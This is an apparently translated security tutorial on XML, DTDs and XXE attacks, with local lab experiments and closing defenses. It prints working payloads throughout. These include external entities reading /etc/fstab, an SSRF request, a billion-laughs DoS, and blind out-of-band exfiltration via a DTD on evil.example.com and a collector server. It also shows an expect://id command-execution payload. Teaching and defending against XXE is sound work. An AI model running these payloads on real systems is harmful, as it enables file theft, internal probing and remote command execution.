Author: King Jiyue
Have you heard of XML injection attacks, or perhaps know a little about them already?
Let's start from the basics of XML and work step by step through the principles and methods behind XML attacks.
This article is meant as an introduction. Please go easy on it, and point out any mistakes you find.
XML is designed to transmit and store data; its focus is the content of the data.
HTML is designed to display data; its focus is the appearance of the data.
XML separates data from HTML.
XML is a software- and hardware-independent tool for transmitting information.
<bookstore> <!-- root element -->
<book category="COOKING"> <!-- child element of bookstore; category is an attribute -->
<title lang="en">Everyday Italian</title> <!-- child element of book; lang is an attribute -->
<author>Giada De Laurentiis</author> <!-- child element of book -->
<year>2005</year> <!-- child element of book -->
<price>30.00</price> <!-- child element of book -->
</book> <!-- end of book -->
</bookstore> <!-- end of bookstore -->
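In XML, some characters have special meanings. Placing a character such as "<" inside element content causes a parse error, because the parser treats it as the start of a new element. To avoid this error, use entity references in place of the special characters.
Table 1: predefined entity references
&lt;    <    less than
&gt;    >    greater than
&amp;   &    ampersand
&apos;  '    apostrophe
&quot;  "    quotation mark
Note to Table 1: in XML, only the characters "<" and "&" are strictly illegal. The greater-than sign is legal, but it is good practice to replace it with an entity reference as well.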
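As a minimal sketch of the replacement rule above, Python's standard library can perform the substitution. The helper name to_xml_text and the sample string are made up for illustration; xml.sax.saxutils.escape replaces &, < and > by default, and the extra mapping passed here adds the two quote characters.

```python
from xml.sax.saxutils import escape, unescape

def to_xml_text(raw: str) -> str:
    """Replace the characters that are special in XML with entity references."""
    # escape() handles &, < and > on its own; the mapping adds the quote
    # characters, which matter mainly inside attribute values.
    return escape(raw, {'"': "&quot;", "'": "&apos;"})

sample = 'if salary < 1000 & name == "Tom"'   # hypothetical input
encoded = to_xml_text(sample)
print(encoded)

# Reversing the substitution gives back the original text.
decoded = unescape(encoded, {"&quot;": '"', "&apos;": "'"})
print(decoded == sample)
```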
A valid XML document is a "well-formed" XML document that also follows the rules of a document type definition (DTD).
DTD introduction
A document type definition (DTD) defines the legal building blocks of an XML document. It defines the document structure with a list of legal elements.
A DTD can be declared inline in an XML document or as an external reference.
Example XML document with an internal DTD
<?xml version="1.0"?>
<!DOCTYPE note [<!-- declares this document to be of type note -->
<!ELEMENT note (to,from,heading,body)><!-- note has four child elements -->
<!ELEMENT to (#PCDATA)><!-- the to element is of type #PCDATA -->
<!ELEMENT from (#PCDATA)><!-- the from element is of type #PCDATA -->
<!ELEMENT heading (#PCDATA)><!-- the heading element is of type #PCDATA -->
<!ELEMENT body (#PCDATA)><!-- the body element is of type #PCDATA -->
]>
<note>
<to>Dave</to>
<from>Tom</from>
<heading>Reminder</heading>
<body>You are a good man</body>
</note>
When the DTD is located outside the XML source file, it is referenced from the DOCTYPE declaration with the following syntax:
<!DOCTYPE root-element SYSTEM "filename">
Example with an external DTD
<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd"><!-- declaration referencing the external DTD -->
<note>
<to>Dave</to>
<from>Tom</from>
<heading>Reminder</heading>
<body>You are a good man</body>
</note>
The "note.dtd" file
<!ELEMENT note (to,from,heading,body)><!-- note has four child elements -->
<!ELEMENT to (#PCDATA)><!-- the to element is of type #PCDATA -->
<!ELEMENT from (#PCDATA)><!-- the from element is of type #PCDATA -->
<!ELEMENT heading (#PCDATA)><!-- the heading element is of type #PCDATA -->
<!ELEMENT body (#PCDATA)><!-- the body element is of type #PCDATA -->
PCDATA means parsed character data, that is, text that will be parsed by the parser. The parser examines the text for entities and markup: tags in the text are treated as markup, and entities are expanded. Parsed character data therefore must not contain literal &, < or > characters; they need to be replaced with the &amp;, &lt; and &gt; entities, respectively.
CDATA means character data, that is, text that will not be parsed by the parser. Tags inside it are not treated as markup, and entities inside it are not expanded.
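The difference can be observed with a small sketch using Python's xml.etree.ElementTree. The element name msg and both sample strings are invented for the illustration.

```python
import xml.etree.ElementTree as ET

# Similar characters, once as parsed character data and once inside CDATA.
parsed = ET.fromstring("<msg>1 &lt; 2 &amp;&amp; 3 &gt; 2</msg>")
literal = ET.fromstring("<msg><![CDATA[1 &lt; 2 <b>not a tag</b>]]></msg>")

print(parsed.text)    # entity references were expanded by the parser
print(literal.text)   # content came through untouched, "<b>" is plain text
print(len(literal))   # number of child elements created from the CDATA content
```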
DTD - elements
Note: since this is only background material, only some common element declaration syntax is shown.
DTD - attributes
Attribute declarations use the following syntax:
<!ATTLIST element-name attribute-name attribute-type default-value>
DTD example:
<!ATTLIST payment type CDATA "check">
XML example:
<payment type="check" />
The attribute type can be one of the following:
The default value can be one of the following:
DTD - entities (important)
Entities are variables used to define shortcuts to plain text or special characters.
An entity reference is a reference to an entity.
Entities can be declared internally or externally.
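A minimal sketch of an internal entity declaration and its expansion, parsed with Python's xml.etree.ElementTree. The entity names writer and site and their values are hypothetical. An external declaration would use the form <!ENTITY name SYSTEM "URI"> instead of a quoted value.

```python
import xml.etree.ElementTree as ET

doc = """<?xml version="1.0"?>
<!DOCTYPE note [
  <!ENTITY writer "Dave">
  <!ENTITY site "example.com">
]>
<note>&writer; writes for &site;</note>"""

note = ET.fromstring(doc)
# Each entity reference (&name;) is replaced by the declared text.
print(note.text)
```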
Introduction to schema (XSD)
XML Schema is an XML-based alternative to DTD.
XML Schema describes the structure of an XML document.
The XML Schema language is also referred to as XSD (XML Schema Definition).
XSD has little bearing on the XXE attacks covered in this article, however. To learn more about it, see http://www.w3cschool.cn/xmlschema/ or http://www.phpstudy.net/e/schema/
Attack techniques
Common techniques:
1. Remote file reading by referencing external entities
2. URL requests (which can be used to launch SSRF)
3. DoS
4. Parameter entities
5. Including external resources through XInclude
1. External entity reference
The content of a file on the target can be obtained through an external entity reference.
Local experiment:
The test.txt file contains 123admin
There is a problem, though: if the content of the file is too complex, XML parsing will fail (for example, when the content contains spaces or special characters such as < > & ;).
There are ways around this. As mentioned above, parameter entities can be used; the details are introduced later.
Another well-known method is the PHP wrapper php://filter, which reads the file through a base64 filter so that the returned content consists only of base64 characters and cannot interfere with the XML format.
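The two variants described above can be sketched as follows. This is an illustration under assumptions, not the code used in the experiment: the path /tmp/test.txt, the entity name content, the root element name and both function names are hypothetical, and the server response is simulated locally by encoding the known file content.

```python
import base64

def build_read_payload(path: str, use_filter: bool = True) -> str:
    """Return an XML document whose external entity points at `path`."""
    if use_filter:
        # php://filter makes PHP return the file as base64 text, so spaces
        # and markup characters in the file cannot break the XML.
        uri = f"php://filter/read=convert.base64-encode/resource={path}"
    else:
        uri = f"file://{path}"
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE root [<!ENTITY content SYSTEM "{uri}">]>\n'
        "<root>&content;</root>"
    )

def decode_response(encoded: str) -> str:
    """Turn the base64 text found in the response back into the file content."""
    return base64.b64decode(encoded).decode("utf-8", errors="replace")

payload = build_read_payload("/tmp/test.txt")           # hypothetical path
simulated = base64.b64encode(b"123admin").decode()       # stands in for the response
print(payload)
print(decode_response(simulated))
```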
2. URL request (SSRF)
A request can be initiated directly through an external entity reference, because many XML parsers fetch the external resource as soon as they read the declaration that references it.
Local experiment:
First, listen on port 1231 at 172.16.169.153:
Then make the request from 172.16.169.142 by loading the XML (simply open the XML in a browser):
As shown in the figure above, the browser keeps loading because the 153 machine returns no data.
State of port 1231 on 172.16.169.153:
This SSRF is worth noting. Most attacks on XML rely on external entity references, so what happens if external entity references are forbidden when the XML is loaded?
In that case most attacks fail, but SSRF does not.
Remember that there is another way to request an external resource: using DOCTYPE directly.
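The two ways of triggering a request can be put side by side in a short sketch. The function names, the entity name req and the root element name are assumptions; the address is the listener from the experiment above.

```python
def entity_request(url: str) -> str:
    """Request made when the external general entity is expanded."""
    return (
        f'<!DOCTYPE root [<!ENTITY req SYSTEM "{url}">]>\n'
        "<root>&req;</root>"
    )

def doctype_request(url: str) -> str:
    """Request made when the parser fetches the external DTD itself."""
    # No ENTITY declaration is involved, which is why disabling external
    # entities alone may not stop this variant.
    return f'<!DOCTYPE root SYSTEM "{url}">\n<root/>'

target = "http://172.16.169.153:1231/"
print(entity_request(target))
print(doctype_request(target))
```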
3. DoS
Any method that ties up a large amount of server resources can cause a DoS. The principle here is nested entity references.
The lol entity contains the string "lol". A lol2 entity then references lol 10 times, a lol3 entity references lol2 10 times, so lol3 contains 10^2 "lol" strings, and so on until lol9 contains 10^8 "lol" strings.
So, reference lol9, and boom.
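The growth described above can be checked with a small sketch that generates the nested declarations and computes the expanded size without actually expanding nine levels. The function names and the root element name lolz are assumptions; only a harmless three-level document is parsed.

```python
import xml.etree.ElementTree as ET

def build_nested_entities(levels: int, fanout: int = 10) -> str:
    """Build a document declaring lol, lol2, ..., lol<levels>."""
    decls = ['<!ENTITY lol "lol">']
    prev = "lol"
    for n in range(2, levels + 1):
        name = f"lol{n}"
        refs = f"&{prev};" * fanout      # reference the previous level `fanout` times
        decls.append(f'<!ENTITY {name} "{refs}">')
        prev = name
    dtd = "\n".join(decls)
    return f'<?xml version="1.0"?>\n<!DOCTYPE lolz [\n{dtd}\n]>\n<lolz>&{prev};</lolz>'

def expanded_copies(levels: int, fanout: int = 10) -> int:
    """Number of "lol" strings the top-level entity expands to."""
    return fanout ** (levels - 1)

small = ET.fromstring(build_nested_entities(3))   # safe: only 100 copies
print(len(small.text) // len("lol"))
print(expanded_copies(9))                          # copies for lol9
print(expanded_copies(9) * len("lol"))             # characters after expansion
```

A document of well under a kilobyte therefore expands to hundreds of megabytes of text, which is where the resource exhaustion comes from.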
4. Parameter entity
Parameter entities were mentioned earlier, in the discussion of file reading: they can get around the parsing failure caused by complex file content.
Parameter entities start with %. Only two rules need to be followed when using them:
1. Parameter entities can only be used inside the DTD. 2. In the internal DTD subset, a parameter entity cannot be referenced inside another markup declaration; that is only possible in an external DTD.
As shown in the figure, /etc/fstab is a file with complex content. If you request it directly with SYSTEM, parsing fails and the file content cannot be read.
Parameter entities can then be used to get around XML's strict syntax rules.
The process is actually very simple:
Content of the start parameter entity: <![CDATA[
Content of the goodies parameter entity: file:///etc/fstab (the file protocol is used to read the file)
Content of the end parameter entity: ]]>
A dtd parameter entity is then defined, which uses SYSTEM to fetch the content of combine.dtd.
The dtd parameter entity is referenced inside the DTD. At that point, the DTD in the source file is effectively as follows:
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///etc/fstab">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil.example.com/combine.dtd">
<!ENTITY all "%start;%goodies;%end;">
Finally, the source file references the general entity all, which causes the file to be read:
<roottag><![CDATA[contents of /etc/fstab]]></roottag>
The CDATA wrapper marks the file content as ordinary characters that are not parsed.
Because the pieces are assembled from parameter entities, the file content does not have to be well-formed XML on its own; the XML parser skips its syntax rules for the CDATA content, which achieves the bypass.
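Why the CDATA wrapper matters can be shown with a local sketch that skips the entity machinery and simply compares the two resulting documents. The sample line is hypothetical; it only needs to contain characters that XML treats as markup.

```python
import xml.etree.ElementTree as ET

# Hypothetical file content containing characters that are markup in XML.
file_content = "UUID=1234 / ext4 defaults 0 1  # <dump> & <pass>"

def parses(xml_text: str) -> bool:
    """Report whether the text is accepted as well-formed XML."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False

raw = f"<roottag>{file_content}</roottag>"
wrapped = f"<roottag><![CDATA[{file_content}]]></roottag>"

print(parses(raw))       # what a plain external entity would effectively produce
print(parses(wrapped))   # what the start/goodies/end combination produces
print(ET.fromstring(wrapped).text == file_content)
```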
Attacker: http://192.168.229.130/ (hosts eval.dtd and 1.php)
Server: http://192.168.229.128/ (hosts 2.php)
The attacker's web directory contains eval.dtd, which is used for the attack. 2.php is then uploaded to the server and executed.
It does not matter if an error is reported.
Here is the code:
1.php:
It simply takes the content passed in the GET parameter and saves it to 1.txt.
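The original 1.php listing is not reproduced here. As a rough Python equivalent of the behaviour just described, under the assumption that the parameter is called file (as in the URLs later in this section), a collector could look like the sketch below. The class name, function names and port are made up.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

def extract_file_param(request_path: str) -> str:
    """Return the value of the `file` query parameter, or '' if it is absent."""
    query = parse_qs(urlparse(request_path).query, keep_blank_values=True)
    return query.get("file", [""])[0]

class Collector(BaseHTTPRequestHandler):
    def do_GET(self):
        # Append whatever arrived in ?file=... to 1.txt.
        with open("1.txt", "a", encoding="utf-8") as out:
            out.write(extract_file_param(self.path) + "\n")
        self.send_response(200)
        self.end_headers()

def serve(port: int = 8000) -> None:
    """Run the collector until interrupted (the port is an arbitrary choice)."""
    HTTPServer(("0.0.0.0", port), Collector).serve_forever()

print(extract_file_param("/1.php?file=MTIzYWRtaW4%3D"))
```

Calling serve() starts the listener; it is left uncalled here so the snippet can be run without opening a port.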
The content of the eval.dtd file is:
Note that when a parameter entity is declared inside another entity's value, &#x25; must be used in place of % in the declaration. Because this is a nested reference to an external parameter entity, using % directly means the parameter entity name will not be found when it is referenced.
Its job is to append the content of the external file entity, %file;, to the request 1.php?file=
In this way, the content read on the server is passed in the file parameter and saved to 1.txt.
In the 2.php file:
The first entity reads the server's local file test.txt.
The second references the remote DTD file.
Pay attention to the order in which the entities are used. First, the parameter entity named dtd is referenced; it loads the attacker's eval.dtd, which provides the definition of the send entity: http://192.168.229.130/1.php?file=%file;
Then the content obtained by the file entity is sent to 192.168.229.130/1.php?file=
At this point, the attacker's server saves it to 1.txt.
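The original eval.dtd and 2.php listings are not reproduced here, so the following is only a sketch of the structure the text describes. The entity names file, dtd and send come from the description above; the wrapper entity name wrap, the root element name, the local path and both function names are assumptions.

```python
def build_eval_dtd(collector: str) -> str:
    """DTD served by the attacker; declares `send` once `wrap` is referenced."""
    # &#x25; is the character reference for "%". It is needed because a
    # parameter entity is being declared inside another entity's value.
    return (
        '<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM '
        f"'{collector}?file=%file;'>\">"
    )

def build_victim_document(local_uri: str, dtd_url: str) -> str:
    """XML parsed on the server: read the file, load the remote DTD, send."""
    return "\n".join([
        '<?xml version="1.0"?>',
        "<!DOCTYPE root [",
        f'<!ENTITY % file SYSTEM "{local_uri}">',
        f'<!ENTITY % dtd SYSTEM "{dtd_url}">',
        "%dtd;",    # 1. pull in eval.dtd, which declares wrap
        "%wrap;",   # 2. expanding wrap declares send, with the file content in its URL
        "%send;",   # 3. referencing send issues the request to 1.php
        "]>",
        "<root/>",
    ])

eval_dtd = build_eval_dtd("http://192.168.229.130/1.php")
document = build_victim_document(
    "file:///var/www/html/test.txt",          # hypothetical location of test.txt
    "http://192.168.229.130/eval.dtd",
)
print(eval_dtd)
print(document)
```

The order of the three references is the point of the sketch: send does not exist until wrap has been expanded, and wrap does not exist until the remote DTD has been loaded.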
As mentioned earlier, when the file being read contains spaces or angle brackets, reading the content directly in this way produces an error:
The parser reports an invalid URL, and no request to http://192.168.229.130/1.php?file= carrying the file content shows up in a packet capture.
Combined with the wrapper discussed earlier, the usual php://filter can be used to read the file as base64:
As follows:
Then just decode it.
Only a few protocols were picked as examples here; any of the supported protocols can be used.
Here are some English documents and examples about the XXE vulnerability:
http://www.synacktiv.fr/ressources/synacktiv_drupal_xxe_services.pdf
http://www.2cto.com/article/201506/404505.html - Z-Blog arbitrary file read
5. Including external resources through XInclude
XInclude-based file inclusion relies on another set of XML syntax constraints: XML Schema.
XInclude provides a more convenient way to retrieve data (there is no need to worry that incomplete data will make the parser throw an error), and the parse attribute lets us force how the referenced file is treated.
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/fstab" parse="text"/>
</root>
However, XInclude has to be turned on manually; XML parsers have it turned off by default.
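Python's standard library illustrates both points: XInclude processing only happens after an explicit call, and parse="text" brings a file in as plain characters even when it contains markup. This is a local sketch; the function name and the temporary sample file are made up, and a plain file path is used as href because that is what the default loader of xml.etree.ElementInclude opens.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

def xinclude_text(path: str) -> str:
    """Pull the file at `path` into a document as plain text via XInclude."""
    root = ET.Element("root")
    ET.SubElement(
        root,
        "{http://www.w3.org/2001/XInclude}include",
        {"href": path, "parse": "text"},
    )
    # Nothing is included until this explicit call: XInclude is opt-in.
    ElementInclude.include(root)
    return root.text

# Sample file with characters that would break a plain external entity.
with tempfile.NamedTemporaryFile(
    "w", suffix=".txt", delete=False, encoding="utf-8"
) as tmp:
    tmp.write("a < b & c\n")
sample_path = tmp.name

included = xinclude_text(sample_path)
os.unlink(sample_path)
print(repr(included))
```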
PHP and Java environments
Extension protocols supported by PHP
Java & Xerces
The default XML parser in Oracle's Java runtime environment is Xerces, an Apache project. Xerces and Java provide a range of features, some of which can lead to serious security problems. The attack techniques above (DOCTYPE for SSRF, file reading, and out-of-band data exfiltration through parameter entities) can be used freely under Java's default configuration. Java/Xerces also supports XInclude, but it requires setXIncludeAware(true) and setNamespaceAware(true).
RCE with PHP & expect
Unfortunately, the expect extension is not installed by default. Where it is installed, however, an XXE vulnerability can be used to execute arbitrary commands.
<!DOCTYPE root[<!ENTITY cmd SYSTEM "expect://id">]>
<dir>
<file>&cmd;</file>
</dir>
Other environments, such as Python and .NET, are affected as well.
Defense
1. Use the method provided by the development language to disable external entities
Note that this does not defend against SSRF made through XML.
PHP:
libxml_disable_entity_loader(true);
Java:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python:
from lxml import etree
xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))
2. Filter XML data submitted by users
Sensitive keywords: <!DOCTYPE, <!ENTITY, SYSTEM, PUBLIC
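A minimal sketch of such a keyword filter, assuming the submitted XML is available as a string. The function name is made up, and the check is deliberately coarse: it will also reject harmless documents that happen to contain the words SYSTEM or PUBLIC, so it is best treated as a supplement to disabling external entities rather than a replacement.

```python
import re

# The keywords listed above, matched case-insensitively.
_SUSPICIOUS = re.compile(
    r"<!DOCTYPE|<!ENTITY|\bSYSTEM\b|\bPUBLIC\b",
    re.IGNORECASE,
)

def looks_dangerous(xml_text: str) -> bool:
    """Return True if the text contains any of the sensitive keywords."""
    return _SUSPICIOUS.search(xml_text) is not None

print(looks_dangerous('<!DOCTYPE root [<!ENTITY cmd SYSTEM "expect://id">]>'))
print(looks_dangerous("<note><to>Dave</to><from>Tom</from></note>"))
```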
Summary
XML attacks are mostly caused by the parser requesting external resources, combined with protocol features that make it easy to get around XML's format requirements. The main keywords are DOCTYPE (DTD declaration), ENTITY (entity declaration), and SYSTEM and PUBLIC (external resource requests).
The various techniques all come from flexible use of general entities and parameter entities.